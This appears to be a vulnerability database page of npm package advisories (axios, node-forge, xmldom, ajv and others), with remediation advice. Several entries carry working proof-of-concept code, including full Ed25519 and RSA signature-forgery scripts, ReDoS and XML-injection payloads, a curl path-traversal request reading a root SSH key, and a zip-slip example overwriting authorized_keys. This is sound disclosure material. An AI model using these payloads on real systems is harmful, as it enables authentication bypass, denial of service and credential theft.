Find, fix and prevent vulnerabilities in your code.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution via the mergeConfig function. An attacker can cause the application to crash by supplying a malicious configuration object containing a __proto__ property, typically by leveraging JSON.parse().

PoC

import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://domain/get", maliciousConfig);

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.30.3, 1.13.5 or higher.

References

• GitHub Commit
• GitHub PR
• GitHub Release

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Uncontrolled Recursion through the toFormData recursive serializer in lib/helpers/toFormData.js. An attacker can crash a process by supplying a deeply nested object as request data or params, causing unbounded recursion and a call-stack overflow during multipart/form-data or query-string serialization.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

• GitHub Commit
• GitHub Commit
• Maintainer's Advisory

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Improper Check for Unusual or Exceptional Conditions through the registerDecorator path in lib/handlebars/compiler/javascript-compiler.js. An attacker can crash the Node.js process by supplying a template with malformed or unregistered decorator syntax, causing the compiled template to call an undefined decorator as a function. This affects applications that compile untrusted templates at request time, especially when the compile/render call is not wrapped in try/catch. A single malicious template such as {{*n}} can trigger an unhandled TypeError and terminate the process.

Workarounds

• Wrap compilation and rendering in try/catch.
• Validate template input before passing it to compile(), and reject decorator syntax if decorators are not used.
• Use pre-compilation at build time and avoid calling compile() on request-time input.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

• GitHub Commit
• Maintainer's Advisory

Overview

node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature in the ed25519.verify function. An attacker can bypass authentication and authorization logic by submitting forged non-canonical signatures where the scalar S is not properly validated, allowing acceptance of signatures that should be rejected according to the specification.

PoC

#!/usr/bin/env node
'use strict';

const path = require('path');
const crypto = require('crypto');
const forge = require('./forge');
const ed = forge.ed25519;

const MESSAGE = Buffer.from('dderpym is the coolest man alive!');

// Ed25519 group order L encoded as 32 bytes, little-endian (RFC 8032).
const ED25519_ORDER_L = Buffer.from([
  0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,
  0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,
]);

// For Ed25519 signatures, s is the last 32 bytes of the 64-byte signature.
// This returns a new signature with s := s + L (mod 2^256), plus the carry.
function addLToS(signature) {
  if (!Buffer.isBuffer(signature) || signature.length !== 64) {
    throw new Error('signature must be a 64-byte Buffer');
  }
  const out = Buffer.from(signature);
  let carry = 0;
  for (let i = 0; i < 32; i++) {
    const idx = 32 + i; // s starts at byte 32 in the 64-byte signature.
    const sum = out[idx] + ED25519_ORDER_L[i] + carry;
    out[idx] = sum & 0xff;
    carry = sum >> 8;
  }
  return { sig: out, carry };
}

function toSpkiPem(publicKeyBytes) {
  if (publicKeyBytes.length !== 32) {
    throw new Error('publicKeyBytes must be 32 bytes');
  }
  // Builds an ASN.1 SubjectPublicKeyInfo for Ed25519 (RFC 8410) and returns PEM.
  const oidEd25519 = Buffer.from([0x06, 0x03, 0x2b, 0x65, 0x70]);
  const algId = Buffer.concat([Buffer.from([0x30, 0x05]), oidEd25519]);
  const bitString = Buffer.concat([Buffer.from([0x03, 0x21, 0x00]), publicKeyBytes]);
  const spki = Buffer.concat([Buffer.from([0x30, 0x2a]), algId, bitString]);
  const b64 = spki.toString('base64').match(/.{1,64}/g).join('\n');
  return `-----BEGIN PUBLIC KEY-----\n${b64}\n-----END PUBLIC KEY-----\n`;
}

function verifyWithCrypto(publicKey, message, signature) {
  try {
    const keyObject = crypto.createPublicKey(toSpkiPem(publicKey));
    const ok = crypto.verify(null, message, keyObject, signature);
    return { ok };
  } catch (error) {
    return { ok: false, error: error.message };
  }
}

function toResult(label, original, tweaked) {
  return {
    [label]: {
      original_valid: original.ok,
      tweaked_valid: tweaked.ok,
    },
  };
}

function main() {
  const kp = ed.generateKeyPair();
  const sig = ed.sign({ message: MESSAGE, privateKey: kp.privateKey });
  const ok = ed.verify({ message: MESSAGE, signature: sig, publicKey: kp.publicKey });
  const tweaked = addLToS(sig);
  const okTweaked = ed.verify({
    message: MESSAGE,
    signature: tweaked.sig,
    publicKey: kp.publicKey,
  });
  const cryptoOriginal = verifyWithCrypto(kp.publicKey, MESSAGE, sig);
  const cryptoTweaked = verifyWithCrypto(kp.publicKey, MESSAGE, tweaked.sig);
  const result = {
    ...toResult('forge', { ok }, { ok: okTweaked }),
    ...toResult('crypto', cryptoOriginal, cryptoTweaked),
  };
  console.log(JSON.stringify(result, null, 2));
}

main();

Remediation

Upgrade node-forge to version 1.4.0 or higher.

References

• GitHub Advisory
• GitHub Commit

Overview

node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature in ASN.1 structures during RSA signature verification. An attacker can bypass signature verification and inject forged signatures by crafting ASN.1 data with extra fields or insufficient padding, allowing unauthorized actions or data integrity violations.

Note:

This is only exploitable if the default verification scheme (RSASSA-PKCS1-v1_5) is used with the _parseAllDigestBytes: true setting (which is the default).

PoC

#!/usr/bin/env node
'use strict';

const crypto = require('crypto');
const forge = require('./forge/lib/index');

// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:
// SEQUENCE {
//   SEQUENCE { OID sha256, NULL },
//   OCTET STRING <32-byte digest>
// }
// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20
const DIGESTINFO_SHA256_PREFIX = Buffer.from(
  '300d060960864801650304020105000420',
  'hex'
);

const toBig = b => BigInt('0x' + (b.toString('hex') || '0'));
function toBuf(n, len) {
  let h = n.toString(16);
  if (h.length % 2) h = '0' + h;
  const b = Buffer.from(h, 'hex');
  return b.length < len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;
}
function cbrtFloor(n) {
  let lo = 0n;
  let hi = 1n;
  while (hi * hi * hi <= n) hi <<= 1n;
  while (lo + 1n < hi) {
    const mid = (lo + hi) >> 1n;
    if (mid * mid * mid <= n) lo = mid;
    else hi = mid;
  }
  return lo;
}
const cbrtCeil = n => {
  const f = cbrtFloor(n);
  return f * f * f === n ? f : f + 1n;
};
function derLen(len) {
  if (len < 0x80) return Buffer.from([len]);
  if (len <= 0xff) return Buffer.from([0x81, len]);
  return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);
}

function forgeStrictVerify(publicPem, msg, sig) {
  const key = forge.pki.publicKeyFromPem(publicPem);
  const md = forge.md.sha256.create();
  md.update(msg.toString('utf8'), 'utf8');
  try {
    // verify(digestBytes, signatureBytes, scheme, options):
    // - digestBytes: raw SHA-256 digest bytes for `msg`
    // - signatureBytes: binary-string representation of the candidate signature
    // - scheme: undefined => default RSASSA-PKCS1-v1_5
    // - options._parseAllDigestBytes: require DER parser to consume all bytes
    //   (this is forge's default for verify; set explicitly here for clarity)
    return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };
  } catch (err) {
    return { ok: false, err: err.message };
  }
}

function main() {
  const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 4096,
    publicExponent: 3,
    privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
    publicKeyEncoding: { type: 'pkcs1', format: 'pem' }
  });

  const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });
  const nBytes = Buffer.from(jwk.n, 'base64url');
  const n = toBig(nBytes);
  const e = toBig(Buffer.from(jwk.e, 'base64url'));
  if (e !== 3n) throw new Error('expected e=3');

  const msg = Buffer.from('forged-message-0', 'utf8');
  const digest = crypto.createHash('sha256').update(msg).digest();
  const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);

  // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.
  const k = nBytes.length;
  // ffCount can be set to any value at or below 111 and produce a valid signature.
  // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.
  // However, current versions of node forge do not check for this.
  // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.
  const ffCount = 0; 
  // `garbageLen` affects DER length field sizes, which in turn affect how
  // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.
  // A small cap (8) is enough here: DER length-size transitions are discrete
  // and few (<128, <=255, <=65535, ...), so this stabilizes quickly.
  let garbageLen = 0;
  for (let i = 0; i < 8; i += 1) {
    const gLenEnc = derLen(garbageLen).length;
    const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;
    const seqLenEnc = derLen(seqLen).length;
    const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;
    const next = k - fixed;
    if (next === garbageLen) break;
    garbageLen = next;
  }
  const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;
  const prefix = Buffer.concat([
    Buffer.from([0x00, 0x01]),
    Buffer.alloc(ffCount, 0xff),
    Buffer.from([0x00]),
    Buffer.from([0x30]), derLen(seqLen),
    algAndDigest,
    Buffer.from([0x04]), derLen(garbageLen)
  ]);

  // Build the numeric interval of all EM values that start with `prefix`:
  // - `low`  = prefix || 00..00
  // - `high` = one past (prefix || ff..ff)
  // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.
  const suffixLen = k - prefix.length;
  const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));
  const high = low + (1n << BigInt(8 * suffixLen));
  const s = cbrtCeil(low);
  if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');

  const sig = toBuf(s, k);

  const controlMsg = Buffer.from('control-message', 'utf8');
  const controlSig = crypto.sign('sha256', controlMsg, {
    key: privateKey,
    padding: crypto.constants.RSA_PKCS1_PADDING
  });

  // forge verification calls (library under test)
  const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);
  const forgedForge = forgeStrictVerify(publicKey, msg, sig);

  // Node.js verification calls (OpenSSL-backed reference behavior)
  const controlNode = crypto.verify('sha256', controlMsg, {
    key: publicKey,
    padding: crypto.constants.RSA_PKCS1_PADDING
  }, controlSig);
  const forgedNode = crypto.verify('sha256', msg, {
    key: publicKey,
    padding: crypto.constants.RSA_PKCS1_PADDING
  }, sig);

  console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');
  console.log('control-node:', controlNode);
  console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');
  console.log('forgery (node/OpenSSL):', forgedNode);
}

main();

Remediation

Upgrade node-forge to version 1.4.0 or higher.

References

• GitHub Advisory
• GitHub Commit

Overview

node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.

Affected versions of this package are vulnerable to Infinite loop via the modInverse function. An attacker can cause the application to hang indefinitely and consume excessive CPU resources by supplying a zero value as input, resulting in an infinite loop.

PoC

'use strict';
const { spawnSync } = require('child_process');

const childCode = `
  const forge = require('node-forge');
  // jsbn may not be auto-loaded; try explicit require if needed
  if (!forge.jsbn) {
    try { require('node-forge/lib/jsbn'); } catch(e) {}
  }
  if (!forge.jsbn || !forge.jsbn.BigInteger) {
    console.error('ERROR: forge.jsbn.BigInteger not available');
    process.exit(2);
  }
  const BigInteger = forge.jsbn.BigInteger;
  const zero = new BigInteger('0', 10);
  const mod = new BigInteger('3', 10);
  // This call should throw or return 0, but instead loops forever
  const inv = zero.modInverse(mod);
  console.log('returned: ' + inv.toString());
`;

console.log('[*] Testing: BigInteger(0).modInverse(3)');
console.log('[*] Expected: throw an error or return quickly');
console.log('[*] Spawning child process with 5s timeout...');
console.log();

const result = spawnSync(process.execPath, ['-e', childCode], {
  encoding: 'utf8',
  timeout: 5000,
});

if (result.error && result.error.code === 'ETIMEDOUT') {
  console.log('[VULNERABLE] Child process timed out after 5s');
  console.log('  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');
  process.exit(0);
}

if (result.status === 2) {
  console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());
  console.log('  -> Check your node-forge installation');
  process.exit(1);
}

if (result.status === 0) {
  console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());
  process.exit(1);
}

console.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');
if (result.stderr) console.log('  stderr:', result.stderr.trim());
process.exit(1);

Remediation

Upgrade node-forge to version 1.4.0 or higher.

References

• GitHub Advisory
• GitHub Commit

Overview

node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.

Affected versions of this package are vulnerable to Uncontrolled Recursion via the fromDer function in asn1.js, which lacks recursion depth. An attacker can cause stack exhaustion and disrupt service availability by submitting specially crafted, deeply nested DER-encoded ASN.1 data.

Remediation

Upgrade node-forge to version 1.3.2 or higher.

References

• GitHub Commit

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via improper enforcement of the arrayLimit option in bracket notation parsing. An attacker can exhaust server memory and cause application unavailability by submitting a large number of bracket notation parameters - like a[]=1&a[]=2 - in a single HTTP request.

PoC

const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Remediation

Upgrade qs to version 6.14.1 or higher.

References

• GitHub Commit

Overview

tar-fs is a filesystem bindings for tar-stream.

Affected versions of this package are vulnerable to Improper Link Resolution Before File Access ('Link Following') through the exports.extract function. An attacker can manipulate the path of extracted files to write outside the intended directory by crafting a malicious tarball.

Workaround

This vulnerability can be mitigated by using the ignore option to ignore paths like symlinks that are not files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

• Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

• Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar-fs to version 1.16.5, 2.1.3, 3.0.9 or higher.

References

• GitHub Commit
• Red Hat Bugzilla Bug

Overview

tar-fs is a filesystem bindings for tar-stream.

Affected versions of this package are vulnerable to Symlink Attack via the extraction process of a maliciously crafted tar file. An attacker can overwrite or write unauthorized files outside the intended directory by exploiting the path traversal and link following vulnerabilities.

Remediation

Upgrade tar-fs to version 1.16.4, 2.1.2, 3.0.7 or higher.

References

• GitHub Commit
• Exploit DB

Overview

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service.

PoC

Input;

const validator = require('validator');

console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 3? ${validator.isLength('test', { max: 3 })}`);
console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 4? ${validator.isLength('test', { max: 4 })}`);
console.log(`Is "test\uFE0F\uFE0F\uFE0F\uFE0F" (String.length: ${'test\uFE0F\uFE0F\uFE0F\uFE0F'.length}) length less than or equal to 4? ${validator.isLength('test\uFE0F\uFE0F\uFE0F', { max: 4 })}`);

Output:

Is "test" (String.length: 4) length less than or equal to 3? false
Is "test" (String.length: 4) length less than or equal to 4? true
Is "test️️️️" (String.length: 8) length less than or equal to 4? true

Remediation

Upgrade validator to version 13.15.22 or higher.

References

• GitHub Gist
• GitHub PR

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to Uncontrolled Recursion in the recursive processing of deeply nested XML documents by several DOM-related operations, including normalize, serializeToString, getElementsByTagName, getElementsByTagNameNS, getElementsByClassName, getElementById, cloneNode, importNode, textContent, and isEqualNode. An attacker can cause the application to crash or become unresponsive by submitting a valid, deeply nested XML payload that triggers uncontrolled recursion and stack exhaustion.

PoC

const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const depth = 5000;
const xml = '<a>'.repeat(depth) + '</a>'.repeat(depth);
const doc = new DOMParser().parseFromString(xml, 'text/xml');
new XMLSerializer().serializeToString(doc);
// RangeError: Maximum call stack size exceeded

Remediation

A fix was pushed into the master branch but not yet published.

References

• GitHub Advisory
• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Release
• GitHub Release

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML Injection due to unvalidated comment serialization. When an application uses the package to create an XML comment from untrusted user input, the package fails to sanitize comment-breaking sequences (like -->). An attacker can input --> to terminate the comment prematurely. Once the comment is broken out of, any text the attacker places after the --> is treated as "live" XML markup by the serializer rather than harmless comment text.

PoC

const { DOMImplementation, DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);

doc.documentElement.appendChild(
  doc.createComment('--><injected attr="1"/><!--')
);

const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <root><!----><injected attr="1"/><!----></root>

const reparsed = new DOMParser().parseFromString(xml, 'text/xml');
console.log(reparsed.documentElement.childNodes.item(1).nodeName);
// injected

Remediation

A fix was pushed into the master branch but not yet published.

References

• GitHub Commit
• GitHub Commit
• GitHub PR

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML Injection in the serialization of DocumentType nodes when attacker-controlled values are provided to the publicId, systemId, or internalSubset fields. An attacker can inject arbitrary XML markup into the serialized output by supplying specially crafted input to these fields, potentially leading to the injection of malicious DOCTYPE declarations or markup outside the intended context.

Note:

This is only exploitable if untrusted data is passed programmatically to createDocumentType or written directly to the relevant properties and then serialized without enabling strict validation.

Workaround

This vulnerability can be mitigated by passing the option { requireWellFormed: true } to XMLSerializer.serializeToString() to enforce validation of the affected fields.

Remediation

A fix was pushed into the master branch but not yet published.

References

• GitHub Advisory
• GitHub Commit
• GitHub Release
• GitHub Release

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML Injection via the createProcessingInstruction function. An attacker can inject arbitrary XML nodes into the serialized output by supplying specially crafted data containing the PI-closing sequence, which is not validated or neutralized during serialization. This can alter the structure and meaning of generated XML documents, potentially impacting workflows that store, forward, sign, or parse XML.

Note:

This is only exploitable if the serialization is performed without passing the { requireWellFormed: true } option.

PoC

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'r', null);
doc.documentElement.appendChild(
    doc.createProcessingInstruction('a', '?><z/><?q ')
);
console.log(new XMLSerializer().serializeToString(doc));
// <r><?a ?><z/><?q ?></r>
//          ^^^^ injected <z/> element is active markup

Remediation

A fix was pushed into the master branch but not yet published.

References

• GitHub Advisory
• GitHub Commit
• GitHub Release
• GitHub Release

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Arbitrary Code Injection due the improper validation of options.imports key names in _.template. An attacker can execute arbitrary code at template compilation time by injecting malicious expressions. If Object.prototype has been polluted, inherited properties may also be copied into the imports object and executed.

Notes:

1. Version 4.18.0 was intended to fix this vulnerability but it got deprecated due to introducing a breaking functionality issue.

2. This issue is due to the incomplete fix for CVE-2021-23337.

Remediation

Upgrade lodash to version 4.18.1 or higher.

References

• GitHub Advisory
• GitHub Commit
• GitHub Issue
• OpenJS Security Advisory

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to Command Injection. Use of crafted recipient email addresses may result in arbitrary command flag injection in sendmail transport for sending mails.

PoC

-bi@example.com (-bi Initialize the alias database.)
-d0.1a@example.com (The option -d0.1 prints the version of sendmail and the options it was compiled with.)
-Dfilename@example.com (Debug output ffile)

Remediation

Upgrade nodemailer to version 6.4.16 or higher.

References

• GitHub Commit
• Vulnerable Code

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to Prototype Pollution through the copy() function in dom.js. Exploiting this vulnerability is possible via the p variable.

DISPUTED This vulnerability has been disputed by the maintainers of the package. Currently the only viable exploit that has been demonstrated is to pollute the target object (rather then the global object which is generally the case for Prototype Pollution vulnerabilities) and it is yet unclear if this limited attack vector exposes any vulnerability in the context of this package.

See the linked GitHub Issue for full details on the discussion around the legitimacy and potential revocation of this vulnerability.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

There is no fixed version for xmldom.

References

• GitHub Commit
• GitHub Issue
• GitHub Release
• Vulnerable Code
• Vulnerable Code

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output through the CLI precompiler in lib/precompiler.js. An attacker can execute arbitrary JavaScript in the generated bundle by supplying crafted template filenames or CLI options such as --namespace, --commonjs, --handlebarPath, or --map. The issue affects the precompiler output path used by bin/handlebars / lib/precompiler.js, where untrusted names and option values were concatenated into emitted JavaScript without escaping.

Workarounds

• Validate template filenames and CLI option values before invoking the precompiler and reject values containing JavaScript string-escaping or statement-breaking characters.
• Use a fixed, trusted namespace string rather than passing it from the command line in automated pipelines.
• Run the precompiler in a sandboxed environment with limited write access.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

• GitHub Commit
• Maintainer's Advisory

Overview

ajv is an Another JSON Schema Validator

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper validation of the pattern keyword when combined with $data references. An attacker can cause the application to become unresponsive and exhaust CPU resources by submitting a specially crafted regular expression payload.

Note:

This is only exploitable if the $data option is enabled.

PoC

const Ajv = require('ajv');

// Vulnerable configuration — $data enables runtime pattern injection
const ajv = new Ajv({ $data: true });

const schema = {
  type: 'object',
  properties: {
    pattern: { type: 'string' },
    value: {
      type: 'string',
      pattern: { $data: '1/pattern' }  // Pattern comes from the data itself
    }
  }
};

const validate = ajv.compile(schema);

// Malicious payload — both the pattern and the triggering input
const maliciousPayload = {
  pattern: '^(a|a)*$',           // Catastrophic backtracking pattern
  value: 'a'.repeat(30) + 'X'    // 30 'a's followed by 'X' to force full backtracking
};

console.time('attack');
validate(maliciousPayload);       // Blocks the entire Node.js process for ~44 seconds
console.timeEnd('attack');

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

• A The string must start with the letter 'A'
• (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
• D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

1. CCC
2. CC+C
3. C+CC
4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

